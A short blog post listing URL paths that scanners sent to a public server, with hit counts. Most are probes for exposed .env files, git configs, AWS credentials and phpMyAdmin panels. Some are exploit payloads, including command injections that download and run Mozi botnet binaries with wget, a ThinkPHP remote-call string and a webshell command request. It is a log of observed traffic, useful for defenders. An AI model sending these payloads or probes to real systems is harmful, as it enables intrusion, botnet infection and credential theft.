url pattern from potential attackers' scanner

If your cloud VPS opens a common port (like 80, 8080) to public internet, there will attract lots of scanner or unknown users scanning every day and night, here I collect and extract the common url pattern sending from scanner or unknown users for a certain period of time.

    850 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    375 /.git/config
    374 /boaform/admin/formLogin
    352 /?XDEBUG_SESSION_START=phpstorm
    308 /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
    257 /Autodiscover/Autodiscover.xml
    251 /_ignition/execute-solution
    238 /console/
    223 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
    217 /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
    213 /actuator/gateway/routes
    189 /owa/auth/logon.aspx
    187 /actuator/health
    177 /owa/auth/x.js
    165 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
    165 /solr/admin/info/system?wt=json
    155 /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
    148 /config/getuser?index=0
    129 /HNAP1/
    117 /mifs/.;/services/LogService
    110 /_profiler/empty/search/results
    105 /wp-login.php
     98 /.aws/credentials
     98 /.well-known/security.txt
     97 /_profiler/phpinfo
     80 /laravel/.env
     78 /login
     77 /core/.env
     77 /info.php
     76 /GponForm/diag_Form?style/
     71 /GponForm/diag_Form?images/
     65 /app/.env
     65 /sdk
     64 /HNAP1
     63 /hudson
     63 /portal/redlion
     62 /c/version.js
     61 /stalker_portal/c/version.js
     60 /flu/403.html
     60 /streaming/clients_live.php
     60 /stream/live.php
     60 /system_api.php
     59 /.git/HEAD
     59 /manager/html
     57 /api/.env
     55 /admin/.env
     55 /config.js
     55 /phpinfo.php
     55 /public/.env
     55 ///remote/fgt_lang?lang=/../../../..//////////dev/
     54 /.env.save
     53 /config.json
     53 /ReportServer
     52 /fuN3
     49 /ab2g
     49 /phpinfo
     46 /.env.bak
     46 /local/.env
     44 /.DS_Store
     44 /sitemap
     44 /sitemap.txt
     43 /pools
     43 /scripts/WPnBr.dll
     43 /?Z72446562432Q1
     42 /CSS/Miniweb.css
     42 /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
     41 /__Additional
     41 /phpmyadmin/index.php
     41 /Portal0000.htm
     41 /Portal/Portal.mwsl
     40 /index.php
     39 /ab2h
     39 /h5/
     39 /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
     38 /docs/cplugError.html/
     38 /xmlrpc.php
     37 /pools/default/buckets
     36 /backend/.env
     36 /xmlrpc.php?rsd
     34 /blog/wp-includes/wlwmanifest.xml
     34 /cms/wp-includes/wlwmanifest.xml
     34 /site/wp-includes/wlwmanifest.xml
     34 /test/wp-includes/wlwmanifest.xml
     34 /web/wp-includes/wlwmanifest.xml
     34 /wordpress/wp-includes/wlwmanifest.xml
     34 /wp1/wp-includes/wlwmanifest.xml
     34 /wp/wp-includes/wlwmanifest.xml
     33 /cgi-bin/luci
     33 /vendor/.env
     32 /version
     31 /news/wp-includes/wlwmanifest.xml
     31 /sito/wp-includes/wlwmanifest.xml
     31 /website/wp-includes/wlwmanifest.xml
     31 /wp2/wp-includes/wlwmanifest.xml
     31 /wp-includes/wlwmanifest.xml
     30 /boaform/admin/formLogin?username=admin&psd=admin
     30 /prod/.env
     29 /ajax
     28 /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
     28 /homes/
     28 /Public/home/js/check.js
     28 /web/.env
     27 /app/
     26 /api/notice
     26 /api/user/ismustmobile
     26 /application/.env
     26 /boaform/admin/formLogin?username=adminisp&psd=adminisp
     26 /frontend_dev.php/$
     26 /script
     26 /wap/
     25 /admin/
     25 /admin.shtml
     25 /api/link/platform
     25 /apps/.env
     25 /crm/.env
     25 /database/.env
     25 /echo.php
     25 /login.html
     25 /m/
     25 /manager/text/list
     25 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
     25 /src/.env
     24 /api/linkPF
     24 /c/
     24 /map/baidumap.xml
     24 /phpmyadmin/
     24 /server-status
     23 /conf/.env
     23 /evox/about
     23 /rb/getip.php?Z72446562432Q1
     23 /stalker_portal/server/tools/auth_simple.php
     22 /jenkins/login
     22 /solr/
     21 /docker/.env
     21 /storage/.env
     21 /telescope/requests
     21 /vendor/laravel/.env
     20 /admin.php
     20 /boaform/admin/formLogin?username=user&psd=user
     20 /config/.env
     20 /.env.prod
     20 /.git
     20 /login.action
     20 /mgmt/tm/util/bash
     20 /protected/.env
     20 /readme.txt
     20 /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
     19 /0bef
     19 /cdn-cgi/trace
     19 /ip.php?Z72446562432Q1
     19 /shop/wp-includes/wlwmanifest.xml
     19 /system/.env
     19 /test.php
     19 /wp-content/
     18 /app/config/.env
     18 /blog/.env
     18 /boaform/admin/formLogin?username=ec8&psd=ec8
     18 /cgi-bin/.env
     18 /config/aws.yml
     18 /editBlackAndWhiteList
     18 /en/.env
     18 /ghksjdghdfksanitycheckqwerjlhfgjksdghlid
     18 /index.html
     18 /tomcatwar.jsp
     18 /tomcatwar.jsp?pwd=j&cmd=id
     17 /2019/wp-includes/wlwmanifest.xml
     17 /audio/.env
     17 /base/.env
     17 /debug/default/view?panel=config
     17 /dev/.env
     17 /library/.env
     17 /metrics
     17 /new/.env
     17 /old/.env
     17 /shell.php
     17 /showLogin.cc
     17 /sites/all/libraries/mailchimp/.env
     17 /www/.env
     16 /1phpmyadmin/index.php?lang=en
     16 /2phpmyadmin/index.php?lang=en
     16 /admin/db/index.php?lang=en
     16 /admin/index.php?lang=en
     16 /administrator/admin/index.php?lang=en
     16 /administrator/db/index.php?lang=en
     16 /administrator/phpmyadmin/index.php?lang=en
     16 /administrator/phpMyAdmin/index.php?lang=en
     16 /administrator/pma/index.php?lang=en
     16 /administrator/PMA/index.php?lang=en
     16 /administrator/web/index.php?lang=en
     16 /admin/phpmyadmin/index.php?lang=en
     16 /admin/phpMyAdmin/index.php?lang=en
     16 /admin/pma/index.php?lang=en
     16 /admin/sqladmin/index.php?lang=en
     16 /admin/sysadmin/index.php?lang=en
     16 /admin/web/index.php?lang=en
     16 /cgi-bin/index2.asp
     16 /database/index.php?lang=en
     16 /dbadmin/index.php?lang=en
     16 /db/db-admin/index.php?lang=en
     16 /db/dbadmin/index.php?lang=en
     16 /db/dbweb/index.php?lang=en
     16 /db/index.php?lang=en
     16 /db/myadmin/index.php?lang=en
     16 /db/phpmyadmin3/index.php?lang=en
     16 /db/phpMyAdmin-3/index.php?lang=en
     16 /db/phpMyAdmin3/index.php?lang=en
     16 /db/phpmyadmin4/index.php?lang=en
     16 /db/phpMyAdmin-4/index.php?lang=en
     16 /db/phpmyadmin5/index.php?lang=en
     16 /db/phpMyAdmin-5/index.php?lang=en
     16 /db/phpmyadmin/index.php?lang=en
     16 /db/phpMyAdmin/index.php?lang=en
     16 /db/webadmin/index.php?lang=en
     16 /db/webdb/index.php?lang=en
     16 /db/websql/index.php?lang=en
     16 /dns-query
     16 /myadmin/index.php?lang=en
     16 /MyAdmin/index.php?lang=en
     16 /mysql-admin/index.php?lang=en
     16 /mysql/admin/index.php?lang=en
     16 /mysqladmin/index.php?lang=en
     16 /mysql/dbadmin/index.php?lang=en
     16 /mysql/db/index.php?lang=en
     16 /mysql/index.php?lang=en
     16 /mysqlmanager/index.php?lang=en
     16 /mysql/mysqlmanager/index.php?lang=en
     16 /mysql/pma/index.php?lang=en
     16 /mysql/pMA/index.php?lang=en
     16 /mysql/sqlmanager/index.php?lang=en
     16 /mysql/web/index.php?lang=en
     16 /phpmyadmin1/index.php?lang=en
     16 /phpMyAdmin1/index.php?lang=en
     16 /phpmyadmin2011/index.php?lang=en
     16 /phpmyadmin2012/index.php?lang=en
     16 /phpmyadmin2013/index.php?lang=en
     16 /phpmyadmin2014/index.php?lang=en
     16 /phpmyadmin2015/index.php?lang=en
     16 /phpmyadmin2016/index.php?lang=en
     16 /phpmyadmin2017/index.php?lang=en
     16 /phpmyadmin2018/index.php?lang=en
     16 /phpmyadmin2019/index.php?lang=en
     16 /phpmyadmin2020/index.php?lang=en
     16 /phpmyadmin2021/index.php?lang=en
     16 /phpmyadmin2022/index.php?lang=en
     16 /phpmyadmin2/index.php?lang=en
     16 /phpMyAdmin2/index.php?lang=en
     16 /phpmyadmin3/index.php?lang=en
     16 /phpMyAdmin-3/index.php?lang=en
     16 /phpMyAdmin3/index.php?lang=en
     16 /phpMyAdmin-4.9.7/index.php?lang=en
     16 /phpmyadmin4/index.php?lang=en
     16 /phpMyAdmin-4/index.php?lang=en
     16 /phpMyAdmin4/index.php?lang=en
     16 /phpMyAdmin-5.1.0/index.php?lang=en
     16 /phpMyAdmin-5.1.1/index.php?lang=en
     16 /phpMyAdmin-5.1.2/index.php?lang=en
     16 /phpMyAdmin-5.1.3/index.php?lang=en
     16 /phpMyAdmin5.1/index.php?lang=en
     16 /phpMyAdmin-5.2.0/index.php?lang=en
     16 /phpMyAdmin5.2/index.php?lang=en
     16 /phpmyadmin5/index.php?lang=en
     16 /phpMyAdmin-5/index.php?lang=en
     16 /phpMyAdmin5/index.php?lang=en
     16 /_phpmyadmin/index.php?lang=en
     16 /_phpmyadmin_/index.php?lang=en
     16 /php-my-admin/index.php?lang=en
     16 /php-myadmin/index.php?lang=en
     16 /phpmy-admin/index.php?lang=en
     16 /phpmyadmin/index.php?lang=en
     16 /phpmyadmin_/index.php?lang=en
     16 /phpmyAdmin/index.php?lang=en
     16 /phpMyadmin/index.php?lang=en
     16 /_phpMyAdmin/index.php?lang=en
     16 /phpMyAdmin/index.php?lang=en
     16 /phpMyAdmin_/index.php?lang=en
     16 /phpmy/index.php?lang=en
     16 /phppma/index.php?lang=en
     16 /pma/index.php?lang=en
     16 /PMA/index.php?lang=en
     16 /program/index.php?lang=en
     16 /query
     16 /resolve
     16 /rest/.env
     16 /room/getRoomBangFans
     16 /shopdb/index.php?lang=en
     16 /sqlmanager/index.php?lang=en
     16 /sql/myadmin/index.php?lang=en
     16 /sql/phpmanager/index.php?lang=en
     16 /sql/phpMyAdmin2/index.php?lang=en
     16 /sql/phpmyadmin3/index.php?lang=en
     16 /sql/phpmyadmin4/index.php?lang=en
     16 /sql/phpmyadmin5/index.php?lang=en
     16 /sql/php-myadmin/index.php?lang=en
     16 /sql/phpmy-admin/index.php?lang=en
     16 /sql/phpMyAdmin/index.php?lang=en
     16 /sql/sql-admin/index.php?lang=en
     16 /sql/sqladmin/index.php?lang=en
     16 /sql/sql/index.php?lang=en
     16 /sql/sqlweb/index.php?lang=en
     16 /sql/webadmin/index.php?lang=en
     16 /sql/webdb/index.php?lang=en
     16 /sql/websql/index.php?lang=en
     16 /webfig/
     16 /wp-admin/.env
     16 /wp-content/.env
     16 /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
     15 /aws.yml
     15 /ip?Z72446562432Q1
     15 /manager/js/left.js
     15 /newsite/.env
     15 /style.css
     15 /Telerik.Web.UI.WebResource.axd?type=rau
     15 /web_shell_cmd.gch
     14 /api/lottery/color
     14 /api/message/webInfo
     14 /api/uploads/apimap
     14 /Content/m_1/js/m_1_Jquery.js
     14 /css/style.css
     14 /h5
     14 /Home/GetAllGameCategory
     14 /index.htm
     14 /js/common.js
     14 /js/json.js
     14 /km.asmx/getPlatParam
     14 /login/kefuxian.mvc
     14 /Public/css/_pk10.css
     14 /public/css/style.css
     14 /Recruit/download_url
     14 /site/.env
     14 /staging/.env
     14 /static/guide/ab.css
     14 /static/wap/css/trade-history.css
     14 /static/wap/js/common.js
     14 /us/img/nyyh/chkjs.js
     14 /v2/start/config

Reference: https://www.metasploit.com/get-started

Disclaimer
  1. License under CC BY-NC 4.0
  2. Copyright issue feedback: dig +short txt issue.imzye.com
  3. Not all the commands and scripts are tested in production environment, use at your own risk
  4. No privacy information is collected here
Buy Me a Coffee